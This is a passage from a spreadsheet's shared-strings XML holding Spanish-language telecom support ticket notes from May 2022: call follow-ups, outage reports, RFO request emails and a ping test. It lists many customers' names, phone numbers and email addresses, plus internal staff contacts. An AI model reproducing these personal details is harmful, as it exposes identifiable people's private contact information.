GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS - CLIENTE SOLICITA LLEGAR CON MASCARILLA KN95</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAMES GRIJALVA 30319629  RESPONDE PERO CORTA LAS LLAMADAS
-ID 3001443352 - 3001443645</t>
  </si>
  <si>
    <t>F4567299</t>
  </si>
  <si>
    <t>F4567316</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR CONTRERAS 47690934 MENCIONA QUE YA APLICARON REINICIO A LOS EQUIPOS PERO CONTINUA EL INCONVENIENTE
-ID 3001095843
NOMBRE DEL CLIENTE: CLUB CAMPESTRE SAN ISIDRO
UBICACIÓN:FINCA SAN ISIDRO ZONA 16  CLUB CAMPESTRE SAN ISIDRO
CONTACTO EN SITIO: EDGAR CONTRERAS - 47690934
HORARIO DE ATENCION:8:00 - 17:00 HRS
GESTIÓN DE PERMISOS: PREGUNTAR POR EDGAR CONTRERAS EN GARITA</t>
  </si>
  <si>
    <t>F4567325</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL PAZ 54820346 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS 17:30
-ID 3001204717</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL PAZ 54820346 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA RFO  AL CORREO -- LGPAZ07@GMAIL.COM --
-ID 3001272088</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA SOLICITUD DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 17:42
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE DICTAMEN TÉCNICO || INFOCHEQUE S.A. || F4567325 || SD1126688
BUENA TARDE
    SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMRESA	ID 	TICKET
INFOCHEQUE S.A.
90001901410T
F4567325
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4567350</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE JAIME MENJIVAR-70716300 ---- COMENTA QUE TIENE PROBLEMAS DE AUDIO, VOZ ROBOTIZADA Y RUIDO EN LAS LLAMADAS- ##SERVICIO AFECTADO POR MASIVA ##
3001117905
COLA:
NOMBRE: A: 0050370716300
NÚMERO: 0050370716300
DURACIÓN: 0:00:22
ESTADO: MARCANDO
DETALLES: 0050370716300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 10:39:04
3001118168
COLA:
NOMBRE: A: 0050325935957
NÚMERO: 0050325935957
DURACIÓN: 0:02:18
ESTADO: CONECTADA
DETALLES: 0050325935957
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 10:41:40</t>
  </si>
  <si>
    <t>F4567351</t>
  </si>
  <si>
    <t>F4567353</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK APARICIO 50378415164 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001129898</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK APARICIO AL 50378415164 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001256346
**</t>
  </si>
  <si>
    <t>F4567355</t>
  </si>
  <si>
    <t>CLIENTE RAFAEL BARRIENTOS 78902269 INDICA QUE TIENEN EL INCONVENIENTE DE PERDIDA DE AUDIO E INTERFERENCIA EN SUS LLAMADAS SALIENTES HACIA NÚMEROS FIJOS. CLIENTE COMENTA QUE INICIÓ EL DÍA DE AYER. SE LE COMENTA QUE SE ESTÁ DANDO SEGUIMIENTO AL CASO. ID:3001103341</t>
  </si>
  <si>
    <t>F4567357</t>
  </si>
  <si>
    <t>SE HABLA CON FERNANDO RODRIGUEZ 41752352 MENCIONA QUE ESTARA REALIZANDO VALIDACIONES POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 3001200352</t>
  </si>
  <si>
    <t>VALIDANDO LO DICHO EN CRONO ANTERIOR, YA EN TRIPARTITA JUAN CARDONA/TEAM LEADER, DOMINGO GÓMEZ/CONSULTOR, CLIENTES (MULTIPERFILES/GUATEFACTURAS), ESTÁN VIENDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE HABLÓ CON HUGO VÉLEZ/CLIENTE 54255578 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A HUGO VÉLEZ/CLIENTE PARA QUE EXPONGA DETALLES DE LO REPORTADO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE; VÍA TELEFÓNICA SE LES LLAMÓ DOS VECES, NO CONTESTAN. SE ESCALA CON JUAN CARDONA/TEAM LEADER PARA APOYO.
CLIENTE INDICA QUE TIENE EN LÍNEA A SU IT Y A PERSONAL DE GUATEFACTURAS PARA REVISIÓN CONJUNTA.</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A CLIENTE FERNANDO RODRIGUEZ 41752352 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001200352</t>
  </si>
  <si>
    <t>F4567359</t>
  </si>
  <si>
    <t>F4567369</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDDY VASQUEZ AL 37175217 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001143207
**</t>
  </si>
  <si>
    <t>F4567370</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANDRA ALVARADO AL 70700425 -25263697 INDICA QUE AHORITA DA AUTORIZACION PARA QUE INGRESEN LOS TECNICOS**
ID 3001444073 - 3001444221
**</t>
  </si>
  <si>
    <t>** SE ENVÍA CORREO A CLIENTE PARA VALIDAR LOS PERMISOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 19 DE MAYO DE 2022 8:09
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; TANIA MORALES &lt;TANIA.MORALES@SEGURIDAD.GOB.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REDUNDANTE || IP2124164SV || DIRECCION GENERAL DE CENTROS PENALES || SANTA ANACENTRO DE SANTA ANA11A C OTE9A AV
ESTIMADOS BUEN DÍA,
FAVOR DE APOYARNOS EN CONFIRMAR LOS ACCESOS PARA EL PERSONAL TÉCNICO DESCRITO EN LA COLA DE CORREOS.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4567371</t>
  </si>
  <si>
    <t>EUGENIA MENDEZ-22507300 CONFIRMA-  PROBLEMAS DE RUIDO Y PERDIDA DE AUDIO ##</t>
  </si>
  <si>
    <t>F4567377</t>
  </si>
  <si>
    <t>CLIENTE MARIA DEL CARMEN 54131743 APOYA UBICANDO EQUIPO AETHRA 6044, PROCEDE A REINICIARLO</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO DEL AETHRA, MARIA DEL CARMEN VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO.
3001117012
COLA:
NOMBRE: A: 50382478
NÚMERO: 011 50250382478
DURACIÓN: 0:07:42
ESTADO: CONECTADA
DETALLES: +50250382478
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 18/05/2022 10:44:33 A. M.</t>
  </si>
  <si>
    <t>F4567379</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ASTRID MIRANDA 78502120
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567384</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE EDUARDO LIMA-54343746 COMENTA QUE NO HA TENIDO INCONVENINTES CON EL SERVICIO, PERO QUE SE VALIDE MAÑANA 10 AM ##LO QUE REPORTA ES QUE DE MANERA ESPORADICA A SE LE CORTA LAS LINEAS + DURA POR 10 SEGUNDOS LA AFECTACION ##VIVO</t>
  </si>
  <si>
    <t>F4567395</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANTOS 89202711 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001161760</t>
  </si>
  <si>
    <t>F4567397</t>
  </si>
  <si>
    <t>HENRY AGUILAR-56955958  || CONFIRMA SERVICIO UP ## VALIDA CIERRE ##
3001163698
COLA:
NOMBRE: A: 56955958
NÚMERO: 56955958
DURACIÓN: 0:01:41
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56955958
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:35:18</t>
  </si>
  <si>
    <t>F4567419</t>
  </si>
  <si>
    <t>CLIENTE YOLANDA MENDEZ 56989154  VALIDA EL SERVICIO Y SE PROCEDE AL CIERRE DEL CASO.
3001117221
COLA:
NOMBRE: A: 22282500
NÚMERO: 22282500
DURACIÓN: 0:04:44
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22282500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 18/05/2022 10:42:45</t>
  </si>
  <si>
    <t>F4567422</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE TIENE PROBLEMAS CON EL AUDIO DE LLAMADAS, AVECES NO SE ESCUCHA O SE ESCUCHAN LLAMADAS DE OTRAS LINEAS, SE LE INDICA QUE SE TIENE FALLA GENERAL Y QUE YA ESTAMOS TRABAJANDO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE PROCEDE A CONTACTAR A CLIENTE ALEJANDRO PÉREZ 74680991 / 74680992
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567442</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE ROXANA MENA-75826853 Y CONTESTA FERNANDO AGUILAR
3001151919
COLA:
NOMBRE: A: 0050375826853
NÚMERO: 0050375826853
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050375826853
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:02:37
3001152100
COLA:
NOMBRE: A: 0050375826853
NÚMERO: 0050375826853
DURACIÓN: 0:00:20
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050375826853
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:02:42
3001152254
COLA:
NOMBRE: A: 0050361874035
NÚMERO: 0050361874035
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050361874035
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:02:46</t>
  </si>
  <si>
    <t>F4567451</t>
  </si>
  <si>
    <t>SE LE LLAMA AL CL FREDDY SANCHEZ AL 30957713 ID 3001501830 PARA EL SEGUIMIENTO Y COMENTA QUE YA NO LE LLAMARON ENTONCES REALIZO LAS PRUEBAS Y SI TIENE LOS MB CONTRATADOS EN SUBIDA Y BAJADA POR LO QUE AUTORIZA EL CIERRE DEL DE LA FALLA Y TICKET, SE CAMBIA A WIP Y SE LE NOTIFICA AL GESTOR  JHONNSER.ESCOBAR PARA EL CAMBIO VIA SKYPE.</t>
  </si>
  <si>
    <t>F4567454</t>
  </si>
  <si>
    <t>**SE LE LLAMA A GABRIELA LOPEZ 48459229 INDICA QUE AUN NO CUENTA CON SERVICIO INDICA QAUE YA REINICIO EL EQUIPO Y NO LEVANTA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE  **
ID 3001148511
**</t>
  </si>
  <si>
    <t>F4567457</t>
  </si>
  <si>
    <t>SE LLAMA A JOSUE HERRERA 50670136426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001164466</t>
  </si>
  <si>
    <t>F4567459</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DONALD CAJINA  AL 505 8740 3712  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001189205
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DONALD CAJINA  AL 505 8740 3712 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001168323
**</t>
  </si>
  <si>
    <t>F4567465</t>
  </si>
  <si>
    <t>CLIENTE IRIS BONILLA 61246053, INDICA QUE PRESENTA RUIDO E INTERFERENCIA EN SUS LLAMADAS ENTRANTES Y SALIENTES, INDICA QUE EL INCONVENIENTE INICIÓ EL DÍA DE AYER., SE LE COMENTA QUE SE ESTÁ DANDO SEGUIMIENTO AL CASO. ID DE LLAMADA: 3001128578</t>
  </si>
  <si>
    <t>F4567466</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ÁNGEL RODRÍGUEZ/CLIENTE; SE LE INFORMA ENLACE AFECTADO POR FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>F4567477</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LISANDRO 22360100 EXT. 3 MENCIONA QUE AUN OBSERVAN EL SERVICIO CAIDO, CLIENTE SOLICITA SE PUEDA ENVIAR PRUEBAS POR CORREO
-ID 3001235907</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 16:28
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE DICTAMEN || SERVICIOS FINANCIEROS ELECTRICOS S A ||F4567477
BUENA TARDE
    SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA	ID 	TICKET
SERVICIOS FINANCIEROS ELECTRICOS S A -
929330OH
F4567477
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LISANDRO 2236-0100 EXT. 3, EXT 63087 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001152050
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON LAS PRUEBAS DE PING A NIVEL DE CLARO SE ENCUENTRA OPERATIVO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 16:00
PARA: ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; LISANDRO JOSE QUESADA SANTOS &lt;LISANDRO.QUESADA@HN.ASESOREXTERNOCA.COM&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
CC: G-ATM HON &lt;ATMHON@BACCREDOMATIC.HN&gt;; G-NOC HON &lt;NOC@BACCREDOMATIC.HN&gt;
ASUNTO: RE: ENLACE DE DATOS AFECTADO-ATM 186 SPS FAMILIAR CHAMELECON
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE, SOLICITAMOS DE SU APOYO EN VALIDAR SERVICIO, SE CULMINARON LOS TRABAJOS DE REPARACIÓN DE FO, POR LO CUAL A NIVEL DE CLARO LO OBSERVAMOS OPERATIVO.
&lt;CSPSHNTMN1D1EIM1&gt;PING -C 1000 -S 1500 -M 30 -B -VPN CREDOMATIC_DATOS 10.94.205.1
  PING 10.94.205.1: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.94.205.1 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/12 MS
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4567478</t>
  </si>
  <si>
    <t>SE LE LLAMA A HENRY GARCIA 57839912 ID: 3001134960
CL COMENTA QUE YA REINICIO EL EQUIPO CISCO Y ESTA CONECTADO A PATCHCORD, ENERGIA EN SITIO OK, LEDS DEL EQUIPO DESPUES DE REINICIO: SOLO PRENDE UNA LED EN FORMA DE S, SE DEJA EN CONFERENCIA CON JHONNSER.ESCOBAR PARA VERIFICAR COMO SE VA A PROCEDER O PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4567499</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE MYNOR MARTINEZ 41007532 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001193984
**</t>
  </si>
  <si>
    <t>NOS ENVIA DIRECTO A BUZON EN TRES OCASIONES, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567503</t>
  </si>
  <si>
    <t>RAFAEL GARCIA-22317939-- CONTESTA SEÑOR YOVANI, COMENTA QUE ESTAN EN ALMUERZO ##  PIDE SE LE LLAME A LAS 13 HORAS
3001154458
COLA:
NOMBRE: A: 0050378032318
NÚMERO: 0050378032318
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378032318
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:08:34</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE RAFAEL GARCIA-22317939    || NO CONTESTA- ENVIA A BUZON ## SE INTENTARA  EN BREVE
3001139396
COLA:
NOMBRE: A: 0050322317939
NÚMERO: 0050322317939
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050322317939
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 11:31:01
3001139850
COLA:
NOMBRE: A: 0050378032318
NÚMERO: 0050378032318
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 0050378032318
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 11:32:04</t>
  </si>
  <si>
    <t>F4567512</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSA M. SANCHEZ AL 56169125 CL INFORMA QUE AUN TIENEN UNA VM A LAS 22:00 HRS Y SE SOLICITA QUE SE LE LLAME MAÑANA A LAS 10:00 AM PARA CONFIRMAR**
ID 3001153245
**</t>
  </si>
  <si>
    <t>SE CONTESTA CORREO A CLIENTE + EJECUTIVO DE CUENTA</t>
  </si>
  <si>
    <t>F4567517</t>
  </si>
  <si>
    <t>SE LLAMA AL CILENTE DANIEL MONZON  78551253 COMENTA QUE PERCIBE INTERFERENCIA EN SUS LLAMADAS SALIENTES Y ENTRANTES, COMENTA QUE EL INCONVENIENTE INICIÓ EL DÍA DE HOY. SE LE COMENTA QUE SE TIENE UNA FALLA GENERAL YA YA SE LE ESTÁ DANDO SEGUIMIENTO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050378551253
NÚMERO: 0050378551253
INICIO: HOY, 12:58 P. M.
FIN: HOY, 01:01 P. M.
DURACIÓN: 2:56
ID DE LLAMADA: 3001173166</t>
  </si>
  <si>
    <t>F4567522</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA ALVARADO 25263669 RESPONDE IVAN LOPEZ MENIONA QUE NO TIENE RESPUESTA DE SUS EQUIPOS POR LO QUE ENVIARA A UN TECNICO A VALIDAR EN PR
CLIENTE SOLICITA LLAMADA PARA LAS  11:30
-ID 3001508345</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SONIA ALVARADO AL 25263669  CONTESTA UNA SEÑORITA E INDICA QUE TRANSFERIRA LA LLAMADA Y CONTESTA LA SEÑORITA TANIA QUIEN SOLICITA QUE SE LE LLAME MAÑANA A PARTIR DE LAS 8:00 AM **
ID 3001253159
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25263669 QUIEN SOLICITA LLAMADA PARA LAS 14:00 HRS
-ID 3001732647</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA ALVARADO 25263669 SOLICITA SE LLAME EN 10 MIN
-ID 3001481884</t>
  </si>
  <si>
    <t>F4567528</t>
  </si>
  <si>
    <t>CLIENTE NOS INDICA QUE NUEVAMENTE ESTA PRESENTANDO PROBLEMAS CON EL SERVICIO DE TELEFONIA, COMENTA QUE YA REINICIARON EL EQUIPO AETHRA Y LA PBX PERO AUN NO RESTABLECE EL SERVICIO, CLIENTE SOLICITA QUE LLEGUE PERSONAL TECNICO A REVISAR EL SERVICIO Y QUE LO SOLVENTEN YA QUE HA TENIDO MUCHAS REINCIDENCIAS NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MIRIAM GUITIERRES 56234833
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567541</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EMERSON AGUILAR AL 47606282 INDICA QUE HAN HABIDO APAGONES DE LUZ EL EQUIPO CISCO SOLO TIENE 2 LUCES ENCENDIDAS EN  COLOR AMARILLO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 3001155463
**</t>
  </si>
  <si>
    <t>F4567542</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OMAR ROMERO 77867426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001159892</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR ROMERO 77867426 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 3001154673</t>
  </si>
  <si>
    <t>F4567545</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR LOPEZ AL 54792098 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001172160
**</t>
  </si>
  <si>
    <t>F4567547</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS GUTIERREZ  51190146 PARA BRINDAR RETROALIMENTACION
-ID 3001204128</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE SCARLET MANZANERO / 41753805 /  ID: 3001150021, SOLICITA SE LE LLAME LUIS GUTIERREZ  51190146, SE DEJA EN CONFERENCIA CON JAIMEJ.HERNANDEZ PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4567560</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SRTA. ANGIE CERRATO 88127340 CONTESTA UNA SEÑORITA LLAMADA CHARLET QUIEN INDICA QUE ELLA USA OTA COMPAÑIA  Y CORTA LLAMADA **
ID 3001173334
**</t>
  </si>
  <si>
    <t>F4567568</t>
  </si>
  <si>
    <t>INFORMA CLIENTE  KEVIN ALDANA 78427369  QUE PRESENTA DESCONEXION ENTRE LAS LLAMADAS REALIZADAS TANTO EN ENTRANTES Y SALIENTES E INDICA QUE LAS LLAMADAS SI ENLAZAN PERO TIENE PROBLEMAS DE AUDIO, SE LE COMENTA QUE SE ESTÁ DANDO SEGUIMIENTO AL INCONVENIENTE. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567575</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE OSCAR CARRERA 51318331 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001150707</t>
  </si>
  <si>
    <t>F4567581</t>
  </si>
  <si>
    <t>YANIRA CANDRAY-25279412 --- SE TIENE EN LINEA
3001144079
COLA:
NOMBRE: A: 0050325279412
NÚMERO: 0050325279412
DURACIÓN: 0:01:09
ESTADO: CONECTADA
DETALLES: 0050325279412
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 11:42:34</t>
  </si>
  <si>
    <t>CLEINTE  CONFIRMA QUE EL PROBLEMA QUE TINE ES VOZ ROBOTIZADA, PERDIDA DE AUDIO Y RUIDO EN LLAMADA</t>
  </si>
  <si>
    <t>F4567590</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PERSONAL DE TURNO AL 78550766 NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
ID 3001250590
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78552751 MENCIONA QUE EL INCONVENIENTE QUE ESTA PRESENTANDO ES CON EL WIFI, ALGUNAS PARTES DONDE ANTES TENIAN SEÑAL AHORA YA NO TIENEN SEÑAL
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001275183</t>
  </si>
  <si>
    <t>F4567592</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PERSONAL DE TURNO AL 78550766 NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
ID 3001177974
**</t>
  </si>
  <si>
